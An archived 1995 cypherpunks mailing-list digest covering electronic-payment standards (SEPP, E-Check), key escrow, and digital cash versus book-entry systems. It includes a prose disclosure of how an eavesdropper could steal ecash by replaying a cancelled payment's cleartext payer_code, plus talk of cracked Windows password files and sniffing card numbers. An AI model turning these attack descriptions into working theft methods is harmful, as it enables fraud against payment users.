do best to narrow the scope. If any suggestion increases the scope significantly, I will recommend that they become a separate work item. Talk on SEPP: John Gould of MasterCard said that the Secure Electronic Payment Protocol (SEPP) is intended to solve MC's business model. We expect to conclude revision to the SEPP review process in less than 60 days. We have a time pressure by customers and member banks to secure our brand products quickly. We will be piloting the result hopefully with VISA and X9. Take the SEPP document as an informational, living, document. We will not know how good it is until we start to pilot it. Taher Elgamal, of Netscape, said that SEPP is a vertical solution rather than a horizontal message format. SEPP solves the credit card transaction where there is a consumer, merchant and merchant's bank. We were not trying to solve the world's payment problems. Credit cards are the simplest model to use. People feel comfortable because the liability is to the benefit of the consumer most of the time. We tried to minimize the impact on the existing medium, banking protocols and networks. The design is a front end to the existing bank network. We had to solve the authentication problem. It is not really exactly known how this will work and if it will scale properly. We tried not to change relationship between parties. We started with a generic philosophy to use standards where they exist. SEPP will be implemented independently by different vendors that have to achieve interoperability. The merchant does not have to see the credit card number even though he does today. The payment/order has dual encryption. The payment instruction is opaque to the merchant. The order details are not of interest to the bank. The message formats are the tools in SEPP, to achieve the product, that is useful. There is an attempt to solve the grand picture. The credit card system is complex. Does the merchant really need to know the identity of the consumer. The merchant is only interested that the person is capable of using the amount. They may want to know, but they may not need to know. We built in an online certification system, which certifies consumers and merchants. For SEPP, the acquiring bank does the certification. Dan mentioned that this is not quite analogous to how it works in the paper model. Frank Jaffe spoke about Echeck. He said that the future is likely to bring more alternatives, not less. We wanted to move the check to a paperless instrument. Eliminate paper and use cryptographic methods to secure it. We're looking at digital signatures to replace hand signatures. The Electronic Check supports multiple check flows. Deposit and Clear (Normal) flow, Cash Check, Z flow, Lockbox flow, and transfer flow. Electronic Check supports multiple business models: Certified Check flow, Interchange, Third Party Payer. Overview: -Develop a secure, all-electronic instrument modeled on paper check primarily for use in electronic commerce -Enable this instrument to be flexible and represent other physical instruments such as cashier's checks, traveler's checks -Develop a general programmatic set of tools and standard interfaces, protocols and formats so that E-Check functions can be used for other applications. -Test approach through a commercial pilot. We would like to develop a reference implementation and tools to make it easier to use it. Electronic Check objectives: -provide individuals and businesses a safe convenient debit payment option -use inexpensive public networks -enable merchants to automate complete transactions We're not trying to specify encryption, to allow parties to use what they want. Key component summary: -hardware token for electronic and checkbook cryptographic key storage -digital signatures for transaction authentication -electronic certificates for account and bank authentication -secure hash for tamper-proofing -encryption for privacy is optional -remittance/invoice/order form included for automated accounts receivable processes -public networks for transmission The scope of the project is to issue payment orders against accounts in banks. If customer wants it, banks can afford it, and it can be done securely than why not? Tom started discussion again on the X.9 Work item. He said that we need to address: what do customers want, what risks do banks want to take and how fast do you want to do it? The banking industry needs a protocol standard for electronic payments. This could be the beginning of something bigger; define a scope for this work item, but as the beginning of a payment protocol. Frank suggested that the project should focus more than just consumer to merchant. Several people suggested trying to develop a more encompassing payment protocol than just consumer to merchant payments, because it is easier to design up front than redesign after it has been implemented. Others suggested that we ought to start with something manageable, like debit or credit cards, but not design ourselves into a corner. If this group does not address payment types, than client software will have to identify between payment types and what merchants and/or banks take what. Taher pointed out that SEPP will not do debit cards well. Will consumers use account based systems in the volume that you expect? Many agreed that speed is important, and encouraged staying focused for time considerations. There was a suggestion to have separate groups developing payment syntax for credit, debit, echeck. One suggestion was to help the consumer to quickly negotiate a payment system of choice. Spending time on credit seems to make sense since it is more widely used on the Internet. NACHA is addressing the check issue. Tom summarized the discussion saying that it appeared that most agreed to stay cognizant of all issues, but focus on the credit model and allow the architecture to expand. We should find what is in common to all payment systems. Make it modular to add on types or variations. Someone suggested a steering committee to address these extensions. Tom proposed an editing group of 6-10 people to get document out on the credit model. He proposed having a meeting of the editing group on January 16th in San Francisco. The full group will meet Feb. 29th at Cylink in Sunnyvale. and tentatively June 7th in Boston at the Fed. However other groups would like to deal with the other issues is up to them. FSTC will find a way to work with this committee through their joint membership. Tom asked Frank to feed back to X9 how FSTC wants to fit Echeck into this work group. All this work item was written to deal with is the syntax, we are not going to deal with the protocol. There would be a multiplicity of protocols that would use it, phone, modem, http. SEPP has an application protocol that is independent of communications. Mohammad Khan volunteered to lead a group to discuss management issues including negotiation. VISA, MC, Discover, IBM, and Cybercash volunteered to participate in that group. ----------- End Forwarded Message ----------- From pkoning at chipcom.com Mon Dec 4 09:14:57 1995 From: pkoning at chipcom.com (Paul Koning 1695) Date: Mon, 4 Dec 95 09:14:57 PST Subject: key escrow compromise Message-ID: <30C3575F@mailer2> Quoting: "Vladimir Z. Nuri" >I tend to agree with Clark in only one regard: the government is going >to get into the key storage/retrieval business in some form or another >eventually & inevitably; it's just not stoppable. Well, I would tend to disagree. If PGP weren't out, you might conceivably have a point. Given that it is out, are you suggesting that the NSA would be able to make all copies of it go away? And all copies of PEM? And everyone else's encrypted Email programs including all those available from many other countries? Shutting down the Internet completely wouldn't be a sufficient measure to make that happen. >the aspect >that is up for grabs is whether these systems will be *mandatory* for >all private communication. I remember some clear statements that this is the goal, as should be obvious, since any smaller goal doesn't make any sense. >here's a quick idea. the post office is getting into >certification authorization come hell or high water (ETA summer, 96). >now, frankly I think this is a good thing. someday we will need some kind >of legal agency to deal with citizen keys, so that we could have >cryptographic dealings with federal agencies such as the motor >vehicles department, etc. Well, I don't know why a government agency that calls itself a non-government agency one minute and hides underneath special government monopoly privileges should be given yet another special privilege, but anyway... yes, clearly at some point we will need certification that will make digital signatures useable. However, that has NO connection with GAK, and in fact is a strong argument against it. If the government has access to my keys, then why should anyone trust my signature? Conversely, certification for digital signatures involves making statements about the validity of PUBLIC keys, and imposes NO requirement on private keys. paul From jimbell at pacifier.com Mon Dec 4 09:16:08 1995 From: jimbell at pacifier.com (jim bell) Date: Mon, 4 Dec 95 09:16:08 PST Subject: "Got a subpoena?" Message-ID: >> >> Note that I am assuming the willingness of the phoneco to be UNCOOPERATIVE, at least according to "the spirit of the rules." They could still cooperate according to the LETTER of the law. > > It's in the phone company's best interest to be cooperative. >*but* in the case of, say, an internet privacy provider, it is in the >provider's best interest to be uncooperative. I would PREFER that I be able to legally obligate my service provider (and phone co) to provide only that level of cooperation which is actually, literally, legally required. I would like to be able to know that if my service is tapped in some way, I receive a letter de-certifying the previous state of non-tapped-ness that it possessed. From sjb at universe.digex.net Mon Dec 4 10:10:48 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Mon, 4 Dec 95 10:10:48 PST Subject: towards a theory of reputation In-Reply-To: <199512022116.NAA11199@jobe.shell.portal.com> Message-ID: <199512041809.NAA24040@universe.digex.net> Hal writes: >Changing the market conventions (say, by introducing escrow agencies) >will change the weightings of the various factors that make up >utility. If I no longer have to trust the honesty of the person I am >trading with (because we have an escrow agency to help us make the >exchange) then the importance of his reputation for honesty goes down. >The result is that the "reputation" curves will change rather >dynamically and unpredictably as we consider different possible >structures in the market. This will make the analysis of them >intractable, I would think. Analytically, using an escrow agent doesn't change the utility function. It replaces the trading partner's honesty reputation estimate with the escrow agent's (which is presumably higher, or why use them?). This is just a parameter substitution. Whence comes the intractability? From pete at loshin.com Mon Dec 4 10:20:45 1995 From: pete at loshin.com (Pete Loshin) Date: Mon, 4 Dec 95 10:20:45 PST Subject: GAK_hit Message-ID: <01BAC24B.759D78A0@ploshin.tiac.net> James Donald wrote: >At 09:25 AM 12/4/95 -0500, John Young wrote: >> 12-4-95. W$Jabber: >> >> "Microsoft Probe Spurs Subpoenas Tied to Internet. >> Antitrust Effort Appears Focused on Windows 95 Disabled >> Rival Software." > >> The subpoena issued to Netscape may be of particular >> significance. In the estimate of Netscape and industry >> observers, > >I regularly use netscape on windows 95, and I conclude that >this subpoena is pure, 100% harassment. What does that mean? I interpret it to mean only that Netscape is being asked to testify _against_ MS. I've been using Win95 along with at least half a dozen different browsers (including about the same number of different Netscape versions), and never had any compatibility problems switching. Most recently I was running IBM Explorer 2.0 until the other day when I "upgraded" to the latest beta of Navigator--at which point Explorer stopped being my default browser. Navigator never asked if I wanted to make it the default, but now all my .htm and .html files have that Navigator look. As soon as this project is done, I'm switching back to Explorer, thank you. -Pete Loshin pete at loshin.com From andrew_loewenstern at il.us.swissbank.com Mon Dec 4 10:22:34 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Mon, 4 Dec 95 10:22:34 PST Subject: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN Message-ID: <9512041821.AA00569@ch1d157nwk> > "If someone wanted to steal a credit card number, all they would > have to do is go to any gas station and look on the ground around > the pumps," says the CTO at Internet security firm Terisa Systems. Sure, if you wanted to steal a card number or two the ground around a gas-station would probably be a good choice. However, if you wanted to steal a thousand card numbers (or maybe even thirty thousand), just sniff packets off a hub near a large Web site that accepts unencrypted (or weakly encrypted) card transactions or hack your favorite ISP's machines. It really bothers me that officers at companies writing net commerce software are regularly quoted in the trade rags comparing the relatively little risk of a single net card transaction vs. a transaction at a restaraunt or gas station. We aren't talking about a crooked clerk who handles at most a few hundred cards per day or an unlocked dumpster with maybe the same number of carbons in it. We are talking about potentially hundreds of thousands of card numbers whizzing through a single point that could be easily (and undetectably) monitored and recorded with off-the-shelf-equipment for later analysis. Even if the transactions are encrypted, a single exploitable weakness discovered after widespread deployment could compromise massive numbers of cards. The stakes are much higher and this will invite much more sophisticated crooks to attempt to defraud the system. andrew From iagoldbe at csclub.uwaterloo.ca Mon Dec 4 11:09:11 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Mon, 4 Dec 95 11:09:11 PST Subject: How to steal ecash (was: Questions/Comments on ecash protocol) In-Reply-To: <199512012222.OAA18230@netcom14.netcom.com> Message-ID: <49vgvh$i7a@calum.csclub.uwaterloo.ca> In article <199512030127.RAA03496 at cory.EECS.Berkeley.EDU>, Ian Goldberg wrote: >Since the payer_code is not supposed to be sent around, how is it sent to >the bank in order to cancel a payment? The document says "This allows him >to cancel the payment (deposit in his account)...", which seems to indicate >that a cancellation is just a deposit (made out to someone else), accompanied >by an appropriate payer_code. It is important that an eavesdropper not >be able to ever see the payer_code that corresponds to a payment, or >else she could present both to the bank and say "cancel this payment", >and get the money "back". After reading the responses to my questions/comments, it seems that, if Charlie (the customer) wants to cancel a payment, his ecash client sends a copy of the payment, including the payer_code field (which evidently was not in the original payment), to the mint. The mint accepts the payment because the payer_code was supplied. However, the payer_code is sent _in the clear_. Thus: How to steal ecash: This method can be used by Mitch, an active eavesdropper, though all he really needs to be able to do is selectively remove or delay packets in transit. Mitch taps either his target, or, better yet, the mint, and watches for deposits to the mint that have the payer_code filled in (a cancelled payment). He delays that packet, and sends the identical deposit to the mint himself (with his own userID in the userhdr, of course). The mint, being unable to know who withdrew the coin originally, has no reason to believe it wasn't Mitch, and so happily deposits the money "back" in Mitch's account. Mitch is then free to release the delay on the original packet, and Charlie's deposit fails (as the coin has already been deposited). So: do I win anything? :-) Disclaimer: Don't do this. Then again, is it illegal to copy ecash? I doubt it's considered counterfeiting. What about creating ecash out of thin air (say I had a magic factoring box (like a quantum computer (well, not yet)))? - Ian "IANAL, but IAA security-wise net.citizen..." From turner at TeleCheck.com Mon Dec 4 11:30:15 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Mon, 4 Dec 95 11:30:15 PST Subject: [POINTER:] Crypto Articles in Dr. Jobbs Journal Message-ID: <9512041930.AA14103@mercury.telecheck.com> For non Dr. Jobbs subscribers: Dr. Jobbs Journal has several articles on encryption, including an article by Ian and Dave on the Netscape crack, multiple encryption, and using MD5 for passwords. Also, there is a very interesting article by the author of Applied Cryptography (the Big Mac himself), looking at differential and linear cryptoanalysis of the DES algorithm. There are also some compression articles as well. From llurch at networking.stanford.edu Mon Dec 4 11:47:53 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Mon, 4 Dec 95 11:47:53 PST Subject: Cracked: WINDOWS.PWL In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Very interesting. Do you have information on the content of the various resource records within a .PWL file? They should be the stored usernames and passwords for every other authenticated service used by the "user profile." I.e. the "default login," say, the local Windows password, encrypts the .PWL file, and the contents are the passwords used for NetWare, NT, Dial-Up Networking, the screen saver, .PWL-enabled "security" utilities, etc. If anyone wants a sample .PWL file including known values of all of the above, I can have it for you within a day. Of course I wouldn't want to give you any *real* passwords. Of course I should just compile your code myself, but it's a busy day, and I'd hate to unnecessarily duplicate someone else's work... - -rich moderator of the win95netbugs list http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMNP9Y3DXUbM57SdAQF+1wP/RFHvnjpne9bGsU6K8xxT3UPav2nt+8wR 2CUnY/Dm32bTDegx7QO8zpUVckNR2YwxG5ivZhBnov8UhMcngWdMLPjkdSCepPXP cvKTTwAVknmxqLXkyuVSn06PGKlNz5RQnluop5s74IJ3nmJPAFnU+/pGWvlZY3cN jh42jdlo/8s= =zDbs -----END PGP SIGNATURE----- From ecarp at netcom.com Mon Dec 4 12:04:36 1995 From: ecarp at netcom.com (Ed Carp) Date: Mon, 4 Dec 95 12:04:36 PST Subject: SEN_sor Message-ID: <199512041905.NAA02443@khijol> > From: John Young > Date: Mon, 4 Dec 1995 07:50:16 -0500 > To: cypherpunks at toad.com > Subject: SEN_sor > 12-4-95. NYPeeper: > "Nearing the $500 Computer for Internet Use." > > Acorn is about to introduce a stripped-down machine for > Net surfing that sells for about $900. By stripping it > of its monitor and hard disk drive, and adding a > high-speed modem, Acorn executives say they can hit a > retail price less than $500. They plan to ship the > Netsurfer by early next year, and are discussing > licensing with Oracle and a number of American and Asian > companies. Oh, hell, even I can do *that*. Let's see ... motherboard, $100. Floppy drive and controller, $50. 14.4KB modem, $50. Case and power supply, another $50 or so. $250 profit. What's so tough about that? Not a bad deal for Acorn, if you ask me. Hell, maybe I'll go into business making the damned things for that kind of profit margin... From cp at proust.suba.com Mon Dec 4 12:07:53 1995 From: cp at proust.suba.com (Alex Strasheim) Date: Mon, 4 Dec 95 12:07:53 PST Subject: key escrow compromise In-Reply-To: <30C3575F@mailer2> Message-ID: <199512042009.OAA04796@proust.suba.com> >I tend to agree with Clark in only one regard: the government is going >to get into the key storage/retrieval business in some form or another >eventually & inevitably; it's just not stoppable. I don't understand this attitude at all. There is no constituency for GAK except for law enforcement. Everyone else hates it. There isn't any legal or constitutional basis for believing that GAK is unstoppable. The more information people have about GAK the less likely it becomes, and more and more people find out about it every day. Perhaps believing our opponents have unlimited power and influence adds to the romance of what we're doing here. But it's not true. This is winnable. From sameer at c2.org Mon Dec 4 12:14:04 1995 From: sameer at c2.org (sameer) Date: Mon, 4 Dec 95 12:14:04 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment In-Reply-To: <9512041705.AA25255@sulphur.osf.org> Message-ID: <199512042005.MAA04678@infinity.c2.org> It doesn't appear that these people seem to care about cash-like anonymous token-based payment schemes. Is that a valid assesment? What is needed to make these people start caring about that? > > ---------- Begin Forwarded Message ---------- > Date: Fri, 1 Dec 1995 22:43:46 -0500 (EST) > From: "Debbie O'Dell" > To: Electronic Commerce Working Group Reflector > Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Standard -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From s1113645 at tesla.cc.uottawa.ca Mon Dec 4 12:18:28 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Mon, 4 Dec 95 12:18:28 PST Subject: [POINTER:] Crypto Articles in Dr. Jobbs Journal In-Reply-To: <9512041930.AA14103@mercury.telecheck.com> Message-ID: You mean Dr. Dobb's Journal. ^ You can look for sources at From sjb at universe.digex.net Mon Dec 4 12:26:45 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Mon, 4 Dec 95 12:26:45 PST Subject: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN In-Reply-To: <9512041821.AA00569@ch1d157nwk> Message-ID: <199512042026.PAA03718@universe.digex.net> Andrew Loewenstern writes: >> "If someone wanted to steal a credit card number, all they would >> have to do is go to any gas station and look on the ground around >> the pumps," says the CTO at Internet security firm Terisa Systems. > >Sure, if you wanted to steal a card number or two the ground around a >gas-station would probably be a good choice. However, if you wanted to steal >a thousand card numbers (or maybe even thirty thousand), just sniff packets >off a hub near a large Web site that accepts unencrypted (or weakly >encrypted) card transactions or hack your favorite ISP's machines. Duh. The point of the article the original poster quoted was that there's little risk to individual *consumers*. If someone sniffs thirty thousand credit cards from a poorly secured web-site, the consumers are still only liable for $50. Of course, the card company gets a big bill, and probably will try to sue the site to recover, and both will pass those costs back to the consumer, assuming they survive. The total cost is still pretty small to the individual. From s1113645 at tesla.cc.uottawa.ca Mon Dec 4 12:29:59 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Mon, 4 Dec 95 12:29:59 PST Subject: Commercial Apachessl Message-ID: Hi Sameer. You mentioned the server won't be commercially free for licensing reasons? (erased that post, darn) The RSA ones? Would it be free for commercial purposes in Canada? (Are the problems restricted to RSA or also RC4?) From turner at TeleCheck.com Mon Dec 4 12:46:38 1995 From: turner at TeleCheck.com (turner at TeleCheck.com) Date: Mon, 4 Dec 95 12:46:38 PST Subject: [POINTER:] Crypto Articles in Dr. Jobbs Journal In-Reply-To: <9512041930.AA14103@mercury.telecheck.com> Message-ID: <9512042047.AA30008@mercury.telecheck.com> Sorry for the brain fart. I've been up without sleep for a very long time... Ever since I attempted to attend the Austin CP meeting which didn't take place, then I was in Dallas most of yesterday and last night. I am running on nicotine, caphine, and.... Its *Dr. Dobbs Journal.* Appologies to the publishers and for those who are sending me corrections... > > For non Dr. Jobbs subscribers: > > Dr. Jobbs Journal has several articles on encryption, > including an article by Ian and Dave on the Netscape crack, multiple > encryption, and using MD5 for passwords. > > Also, there is a very interesting article by the author of Applied > Cryptography (the Big Mac himself), looking at differential and linear > cryptoanalysis of the DES algorithm. > > There are also some compression articles as well. > > From andrew_loewenstern at il.us.swissbank.com Mon Dec 4 12:52:02 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Mon, 4 Dec 95 12:52:02 PST Subject: INTERNET SECURITY RISKS FOR CONSUMERS OVERBLOWN Message-ID: <9512042051.AA00620@ch1d157nwk> Scott Brickner writes: > Of course, the card company gets a big bill, and probably will try > to sue the site to recover, and both will pass those costs back to ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > the consumer, assuming they survive. The total cost is still pretty ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > small to the individual. You just said it right there. The cost doesn't go away. Just because individual credit card holders each only have to pay for a small fraction of the fraud pie doesn't make it right for executives to be saying that it is safe. Any more than it is right for cellular companies to completely ignore security concerns because "the total cost is still pretty small to the individual." The point is that these costs, no matter how small at the individual cardholder level, are avoidable. Why should consumers have to pay for fraud that can be prevented? By ignoring security concerns, encouraging people to use card numbers in an unsafe manner, and then passing the fraud burden onto the individual customers, card issuers will basically be stealing money from the consumers much in the same way that cellular telcos have been doing for years. andrew From attila at primenet.com Mon Dec 4 13:13:22 1995 From: attila at primenet.com (attila) Date: Mon, 4 Dec 95 13:13:22 PST Subject: SEN_sor In-Reply-To: <199512041905.NAA02443@khijol> Message-ID: On Mon, 4 Dec 1995, Ed Carp wrote: > > Oh, hell, even I can do *that*. Let's see ... motherboard, $100. > Floppy drive and controller, $50. 14.4KB modem, $50. Case and power > supply, another $50 or so. $250 profit. > > What's so tough about that? Not a bad deal for Acorn, if you ask me. > Hell, maybe I'll go into business making the damned things for that > kind of profit margin... > actually, you need to produce it in volume for $50 to $62.50 in order to afford the overhead, sales effort, service effort, advertising, and that good stuff. other than the floppy drive, I can make it for less than $50 in exportd cost from HingKong with a 486-33 knockoff. Of course, you will charge the cusotmer extra for the 256M extra memory.... From unicorn at schloss.li Mon Dec 4 13:23:41 1995 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 4 Dec 95 13:23:41 PST Subject: Netscape gives in to key escrow In-Reply-To: <951204173237.20a03d03@ROCK.CNB.UAM.ES> Message-ID: On Mon, 4 Dec 1995 JR at ns.cnb.uam.es wrote: > Black Unicorn wrote > >On Fri, 1 Dec 1995 JR at ns.cnb.uam.es wrote: > > > >Let's put this example in a more personal context, with you as the > >netscape guru. In fact, let us carry that assumption along, as really > >I'm talking to the netscape insiders to begin with. > > Please, not that I have no liaison to Netscape. But I don't like all > this broohaha about whether this or that guy is evil because s/he does/ > doesn't hold with some principles/ends. > > If one wants to be effective, one needs to understand the other > side's point of view, so as to be able to develop coherent strategies that > work. > > Independently of what *my* personal convictions are -which I > have never stated-, you can't forget that not everybody holds to your > same ethics or needs to. I'm afraid you have missed the point too. I don't care as much what the personal positions are, or what the ethical center from which person x or person y works. I am most distressed because of what I see as a snowjob. "We are anti-GAK" Great, tell me what you have done to prevent GAK from proliferating. In the absence of an answer to that challenge, I have to question the first statement as fluff or PR. This has nothing to do with Netscape sharing my opinion, or not sharing my view on the evil of GAK. It has to do with putting up or shutting up. I have been told that Netscape agrees with me, or will agree with me, I just don't know that I believe it yet. > > ... > > > >Your faith in Joe Random vastly exceeds mine. > > So it seems. Anyway, that's the only resource we have. If Joe > Random doesn't care, then it doesn't matter too much what you or me > can say. Uh... read the above again real carefully. Think real hard about what you have said. > Nor would it be correct that we imposed our view to the > majority of Joes. Isn't that what happens every day? Or did something go anarchy while I wasn't watching? > > ... > >Your information cost is lower by a factor of 100 or more. Putting the > >burden on our shoulders, and then couching it in terms of the cypherpunks > >being negative, when indeed we are merely pointing out to whoever will > >listen that a spineless money decision has been made, is the center of > >hyprocracy. It sickens me. > > Again, I'm not Netscape. So, don't tell *me*. If it sickens you > the position of anyone, I'm sorry. It may sicken me too, but I don't > think that only will change how things are (sic). > ... > >As does this psycho-babble trash. > > It may be trash. But it works. Sorry if you don't like it, but > that's how humans are. And this is what I am talking about. Statements from Netscape and her employees are beginning to look more and more like mere fluff, lies, and time-buyers based on the belief that this kind of psycho babble is the way to conduct your affairs. > >So when pinto's explode, I might as well just advertize hondas as a > >'better value' and not mention the rather glaring fault in the competing > >product? > > Well, that -as I said- may depend on where you are. In some > countries you could sue them, but you could not *say* they are bad. > Odd, isn't it? But so it is. I know of no country that forbids private parties (cypherpunks list) from pointing out flaws and concerns with a product. (accepting of course those countries which lack the basic free speech, or where the government owned industry is being commented on). Your complaint about the potential liability of such statements was in reference to the cypherpunks, or at least a few on the list, being 'negative' about Netscape. A private action for that, when based on fact, isn't actionable anywhere I know about. > >I might add, few cypherpunks (to their great credit) sell their > >software. We are interested in the software being the strongest, and > >best quality. > > > So do I. And that's what I suggested: better alternatives. If > there are some, then market forces will drive everything to our side. > Just by making people angry we won't gain much. Its the angry customer who walks out and takes his consumer cash elsewhere. It amazes me how content everyone is to limit themselves. > .. > >You mean to realize that Netscape could care less about the 'educated' > >consumer who is displeased with the decision, and instead is following > >that large nose which sniffs the waifting scent of green? > > Exactly. If you realize that, you know what the problem is. If > you assume any company has to be bounded by any cypherpunkish ideas, > which in addition hurt their business, then you are not addressing the > real problem. I don't have a problem with the company that is money grubbing until they try to convince me that they are not and then fail utterly to back it up. One might even say that's a form of fraud. > ... > >Either support GAK or do not. Don't give us horseshit about how you > >think we are being too hard on Netscape because we are educated > >consumers, and because we realize that GAK crypto is not the best product it > >could be. > > Sorry man, but as soon as Democracy comes in, elites go out the > window. It's the domain of the common man. If the common man doesn't hold > with the opinions of the educated man, then the educated man has nothing > to do. Except try and educate the common man. Look like anything that has been going on here on the list? Duh. > >It is as much our right to gripe and moan about the spineless decision as > >it is for you to make it. To tell us to ignore it is hypocritical in the > >extreme. If your product is so superior, why the hell should you care > >about a few cypherpunks moaning about this or that? Aren't we members of > > You can gripe or moan or do as you wish. So do I, and I chose to > express my opinion that educating the common man is more effective. And griping and moaning isn't educating the common man because...? > And once more: it's not my product. I have nothing to do with > Netscape. All I want is energies derived into effective courses. Like sitting on hands. Like admitting "there is nothing for (us) to do?" > >Take your emotional censorship elsewhere. And while your at it, try > >making a superior product to please us, rather than some high-school > >textbook psycho-babble about saying only nice things to the other > >children in the sandbox. > > I fear it is you who's becoming emotional and censoring. I didn't > tell anybody to take his/her opinions anywhere else. I'm only exposing what > my opinion is on how cryptography should be promoted and what is the > -in my humble opinion- best course of action. > > As for "children in the sandbox"... it also seems I have some more > respect for those "Joe Random"s than you do. And even if they are so, I > prefer to take them into adulthood rather than keeping crypto priesthood > to myself and pontificing them what they should do relying on me. I'd be happy if Joe Random became Joe Crypto. Unlike you, I just don't assume that it has already happened. > > jr > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From rsalz at osf.org Mon Dec 4 13:29:39 1995 From: rsalz at osf.org (Rich Salz) Date: Mon, 4 Dec 95 13:29:39 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Message-ID: <9512042126.AA25932@sulphur.osf.org> > It doesn't appear that these people seem to care about > cash-like anonymous token-based payment schemes. Is that a valid > assesment? What is needed to make these people start caring about > that? I didn't go to the meeting. On the other hand, I notice Cybercash people in influential positions on the comittee. I'd also contact > > From: "Debbie O'Dell" > > To: Electronic Commerce Working Group Reflector From rah at shipwright.com Mon Dec 4 13:34:44 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 4 Dec 95 13:34:44 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Message-ID: > It doesn't appear that these people seem to care about >cash-like anonymous token-based payment schemes. Is that a valid >assesment? What is needed to make these people start caring about >that? My guess is, they won't. Ever. We're looking right into the maw of the beast, here, folks. This is how book-entry systems want to rule the world. It seems to me that all this X.BlaBla stuff is about interlocking directories, offsetting book-entries and audit trails back to the flood, so that if you break a trade, much less evade taxes or engage in other horsemanlike behavior, they can sic the Lawfully Deputed Authorities to slam you in the pokey. Code words for this bunch include "non-repudiation", "Certification Authorities", "X.Whatever", and of course "information infrastructure", and is done usually in concert with, well, lawyers. Michael Froomkin has had some experience with these types already this month, and my anonmyous informant, "Erwin Corey" , the world's foremost authority, is in the thick of these things. I just got some mail from someone over at bnn who gave me the following argument, just to show how they think: 1. If we use internet-level (ISP) or link-level (SSL,etc) strong cryptography, governments can't keep an eye on the 4 horsemen, who would then rule the world, and the government needs to save us from that. 2. If we just use encryption for the "little" stuff, like credit card numbers, and signatures, and wire authorization codes, and the like, the Powers that Be will let us play with money on the internet. 3. So, go back to your sandbox boy, and let the adults get on with the Important Stuff, okay? Actually, argument #3 is implicit in all of this, but that's okay. Here's why. As one cursed with hyper-analogizing the universe, I see the X.whatever crowd as centralized surface transport, viz: Railroads and Ships. We're in the car and plane business, point-to-point, autonomously operated by the users of the technology for whatever they want to do. The time is, say, 1910. They look up in the sky at the airplanes rattling around, or they jump out of the way of a Model T clattering down the street, and they mutter, "let the adults get on with the Important Stuff". Cool. What they really don't understand is that the internal combustion engine of internetwork commerce, digital bearer certificate technology, is about to rock their world. The thing I hear over and over from these people is, "We just want to map all this great experience we have with the Law of Commerce onto the Information Superhighway, so we won't have to reinvent the wheel." They can't understand why *anyone* would want to remain anonymous. They can't imagine the benefits of uncontrolled autonomous agents, buying or selling things, (including themselves) in a global ecology of networks and silicon. Just like the transportation magnates of the turn of the century couldn't understand why someone wouldn't use a steam engine, because they're much more efficient thermodynamically than any internal combustion engine could ever be. The technology lends itself to economies of scale, and, well, it's lest wasteful that way. This is why J.Pierpont Morgan made a fortune consolidating railroads and steel companies. These people are just victims of their own success, really. They are the end products of years of meritocratic selection, schooling, and certification. They have been practically bred to inhabit the top of hierarchies. So, when they look at the internet, they can see nothing else but what they know. They see something like digital cash an anomaly, an error in the data, because even with a completely on-line system and Mark Twain Bank walking very gingerly on the thin ice of new economic technology, MTB's cost on a Digicash trade is $.50, while the most efficient book-entry system on the net, First Virtual, has to charge, what? $5.00 to break even? Wait until we can actually trust off-line payment schemes for *really* small stuff, and get profits from issuing nano-money. They don't get it. The network isn't a hierarchy. The network is a geodesic. You don't need offsetting book entries, you can trade digital certificates much cheaper. You don't need to control your software, you need to make it autonomous and set it free. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From andrew_loewenstern at il.us.swissbank.com Mon Dec 4 14:08:10 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Mon, 4 Dec 95 14:08:10 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Message-ID: <9512042207.AA00653@ch1d157nwk> Sameer (sameer at c2.org) writes: > > It doesn't appear that these people seem to care about > > cash-like anonymous token-based payment schemes. Is that a valid > > assesment? What is needed to make these people start caring about > > that? Rich (rsalz at osf.org) responds: > I didn't go to the meeting. On the other hand, I notice Cybercash > people in influential positions on the comittee. But "CyberCash" isn't cash... DigiCash == THE company with digital cash technology CyberCash == Yet Another Company with a Net Credit Card Payment System andrew From sameer at c2.org Mon Dec 4 14:46:54 1995 From: sameer at c2.org (sameer) Date: Mon, 4 Dec 95 14:46:54 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment In-Reply-To: <9512042126.AA25932@sulphur.osf.org> Message-ID: <199512042241.OAA22114@infinity.c2.org> As Andrew conveniently pointed out, it doesn't seem that cybercash suits my purposes very well. I'll contact the addresses below, and will inform the list of my results. Thanks. > > > It doesn't appear that these people seem to care about > > cash-like anonymous token-based payment schemes. 